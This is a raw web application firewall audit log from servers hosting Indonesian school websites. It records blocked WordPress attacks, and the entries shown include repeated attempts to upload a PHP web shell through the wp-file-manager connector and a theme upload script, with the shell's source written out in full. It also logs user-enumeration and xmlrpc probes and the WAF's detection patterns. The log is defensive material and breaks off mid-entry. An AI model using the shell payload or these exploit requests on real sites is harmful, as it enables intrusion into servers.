Engine-Mode: "ENABLED" --c2cb6b19-Z-- --83588214-A-- [18/May/2025:18:15:07 +0700] aCnBOxir-GlPrFVVKe5sgAAAAEY 103.236.140.4 54256 103.236.140.4 8181 --83588214-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --83588214-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83588214-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747566907176711 3303 (- - -) Stopwatch2: 1747566907176711 3303; combined=2078, p1=450, p2=1588, p3=0, p4=0, p5=40, sr=70, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83588214-Z-- --11007274-A-- [18/May/2025:18:15:07 +0700] aCnBOxir-GlPrFVVKe5sgQAAAE4 103.236.140.4 54262 103.236.140.4 8181 --11007274-B-- GET /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: https Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --11007274-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11007274-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747566907335645 3013 (- - -) Stopwatch2: 1747566907335645 3013; combined=1636, p1=414, p2=1191, p3=0, p4=0, p5=31, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11007274-Z-- --63b14a4f-A-- [18/May/2025:18:19:36 +0700] aCnCSFewLfDrCkDGIGyHNgAAAME 103.236.140.4 60342 103.236.140.4 8181 --63b14a4f-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 143.198.94.52 Cookie: X-Varnish: 151109568 --63b14a4f-C-- Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --63b14a4f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --63b14a4f-E-- --63b14a4f-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567176695796 2133 (- - -) Stopwatch2: 1747567176695796 2133; combined=741, p1=434, p2=279, p3=0, p4=0, p5=28, sr=71, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --63b14a4f-Z-- --74373555-A-- [18/May/2025:18:19:37 +0700] aCnCSVewLfDrCkDGIGyHTQAAAME 103.236.140.4 60398 103.236.140.4 8181 --74373555-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: http Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=a0b62c066d6dd6d31e849b94a6610f06 X-Forwarded-For: 143.198.94.52 Cookie: X-Varnish: 151109603 --74373555-C-- --a0b62c066d6dd6d31e849b94a6610f06 Content-Disposition: form-data; name="cmd" upload --a0b62c066d6dd6d31e849b94a6610f06 Content-Disposition: form-data; name="target" l1_Lw --a0b62c066d6dd6d31e849b94a6610f06 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --a0b62c066d6dd6d31e849b94a6610f06-- --74373555-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --74373555-E-- --74373555-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567177646948 3175 (- - -) Stopwatch2: 1747567177646948 3175; combined=2023, p1=394, p2=1599, p3=0, p4=0, p5=29, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --74373555-Z-- --2c70c955-A-- [18/May/2025:18:20:48 +0700] aCnCkPypzAd0elWOk7pnygAAAAw 103.236.140.4 33284 103.236.140.4 8181 --2c70c955-B-- GET /wp-content/uploads/mfw-activity-logger/csv-uploads/TitaniumEx.php?Titanium=Ex HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 611 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --2c70c955-C-- =TitaniumExV1.php&=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --2c70c955-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c70c955-E-- --2c70c955-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generi Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567248540648 2007 (- - -) Stopwatch2: 1747567248540648 2007; combined=720, p1=409, p2=283, p3=0, p4=0, p5=28, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c70c955-Z-- --c583c544-A-- [18/May/2025:18:20:50 +0700] aCnCkvypzAd0elWOk7pn2AAAAAg 103.236.140.4 33396 103.236.140.4 8181 --c583c544-B-- POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 625 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: application/x-www-form-urlencoded --c583c544-C-- Filedata=TitaniumEx.php&Filedata=%0A%3C%3Fphp+%0Aif+%28%24_GET%5B%27Titanium%27%5D+%3D%3D+%27Ex%27%29%7B%0A++++echo+%27%3Cpre%3E%3Cp%3ETelegram+%3A+%40BIBIL_0DAY%3C%2Fp%3E%27.php_uname%28%29.%22%0A%22.%27%3Cbr%2F%3E%3Cform+method%3D%22post%22+enctype%3D%22multipart%2Fform-data%22%3E%3Cinput+type%3D%22file%22+name%3D%22__%22%3E%3Cinput+name%3D%22_%22+type%3D%22submit%22+value%3D%22Upload%22%3E%3C%2Fform%3E%27%3Bif%28%24_POST%29%7Bif%28%40copy%28%24_FILES%5B%27__%27%5D%5B%27tmp_name%27%5D%2C+%24_FILES%5B%27__%27%5D%5B%27name%27%5D%29%29%7Becho+%27Uploaded%27%3B%7Delse%7Becho+%27Not+Uploaded%27%3B%7D%7D%0A%7D%0A%3F%3E%0A --c583c544-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c583c544-E-- --c583c544-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\b(?:f(?:tp_(?:nb_)?f?(?:ge|pu)t|get(?:s?s|c)|scanf|write|open|read)|gz(?:(?:encod|writ)e|compress|open|read)|s(?:ession_start|candir)|read(?:(?:gz)?file|dir)|move_uploaded_file|(?:proc_|bz)open|call_user_func)|\\$_(?:(?:pos|ge)t|session))\\b" at ARGS:Filedata. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "70"] [id "211230"] [rev "1"] [msg "COMODO WAF: PHP Injection Attack||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: $_GET found within ARGS:Filedata: \x0a

Telegram : @BIBIL_0DAY

'.php_uname().\x22\x0a\x22.'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}}\x0a}\x0a?>\x0a"] [severity "CRITICAL"] [tag "CWA Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567250575447 1773 (- - -) Stopwatch2: 1747567250575447 1773; combined=657, p1=381, p2=247, p3=0, p4=0, p5=28, sr=66, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c583c544-Z-- --963ec72a-A-- [18/May/2025:18:20:51 +0700] aCnCk0PRqak7bVuUS6dF2AAAAIM 103.236.140.4 33446 103.236.140.4 8181 --963ec72a-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Referer: www.google.com Host: up.smkn22jakarta.sch.id X-Real-IP: 143.198.94.52 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 143.198.94.52 X-Forwarded-Proto: http Connection: close Content-Length: 733 User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 Content-Type: multipart/form-data; boundary=5fbb6cf0922da7f286f5eb3f3543fa55 --963ec72a-C-- --5fbb6cf0922da7f286f5eb3f3543fa55 Content-Disposition: form-data; name="cmd" upload --5fbb6cf0922da7f286f5eb3f3543fa55 Content-Disposition: form-data; name="target" l1_Lw --5fbb6cf0922da7f286f5eb3f3543fa55 Content-Disposition: form-data; name="upload[]"; filename="TitaniumEx.php" Content-Type: multipart/form-data

Telegram : @BIBIL_0DAY

'.php_uname()." ".'
';if($_POST){if(@copy($_FILES['__']['tmp_name'], $_FILES['__']['name'])){echo 'Uploaded';}else{echo 'Not Uploaded';}} } ?> --5fbb6cf0922da7f286f5eb3f3543fa55-- --963ec72a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --963ec72a-E-- --963ec72a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||up.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567251644898 3685 (- - -) Stopwatch2: 1747567251644898 3685; combined=2362, p1=423, p2=1880, p3=0, p4=0, p5=58, sr=70, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --963ec72a-Z-- --3867f002-A-- [18/May/2025:18:33:04 +0700] aCnFcFewLfDrCkDGIGyLegAAANc 103.236.140.4 44084 103.236.140.4 8181 --3867f002-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.129 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --3867f002-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3867f002-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747567984684367 4594 (- - -) Stopwatch2: 1747567984684367 4594; combined=2399, p1=781, p2=1583, p3=0, p4=0, p5=35, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3867f002-Z-- --58703e5f-A-- [18/May/2025:18:33:10 +0700] aCnFdlewLfDrCkDGIGyLiwAAAMg 103.236.140.4 44204 103.236.140.4 8181 --58703e5f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.85.129 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.85.129 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58703e5f-C-- demo.sayHello --58703e5f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58703e5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747567990673659 6667 (- - -) Stopwatch2: 1747567990673659 6667; combined=5448, p1=610, p2=4555, p3=49, p4=70, p5=96, sr=74, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58703e5f-Z-- --43af4d4a-A-- [18/May/2025:18:46:37 +0700] aCnInVewLfDrCkDGIGyOFQAAAM0 103.236.140.4 57390 103.236.140.4 8181 --43af4d4a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.161 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --43af4d4a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43af4d4a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747568797255961 3017 (- - -) Stopwatch2: 1747568797255961 3017; combined=1387, p1=479, p2=879, p3=0, p4=0, p5=29, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43af4d4a-Z-- --5dcd4205-A-- [18/May/2025:18:46:46 +0700] aCnIplewLfDrCkDGIGyOGAAAAMA 103.236.140.4 57576 103.236.140.4 8181 --5dcd4205-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.41.161 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.41.161 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5dcd4205-C-- demo.sayHello --5dcd4205-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5dcd4205-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747568806614927 6050 (- - -) Stopwatch2: 1747568806614927 6050; combined=4433, p1=635, p2=3576, p3=37, p4=40, p5=86, sr=68, sw=59, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5dcd4205-Z-- --f18cb716-A-- [18/May/2025:19:34:47 +0700] aCnT5xir-GlPrFVVKe6ARQAAAE8 103.236.140.4 35426 103.236.140.4 8181 --f18cb716-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.87.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.87.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f18cb716-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f18cb716-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747571687754833 2361 (- - -) Stopwatch2: 1747571687754833 2361; combined=1260, p1=406, p2=819, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f18cb716-Z-- --11c41e58-A-- [18/May/2025:19:34:55 +0700] aCnT70PRqak7bVuUS6dh4AAAAJI 103.236.140.4 35604 103.236.140.4 8181 --11c41e58-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 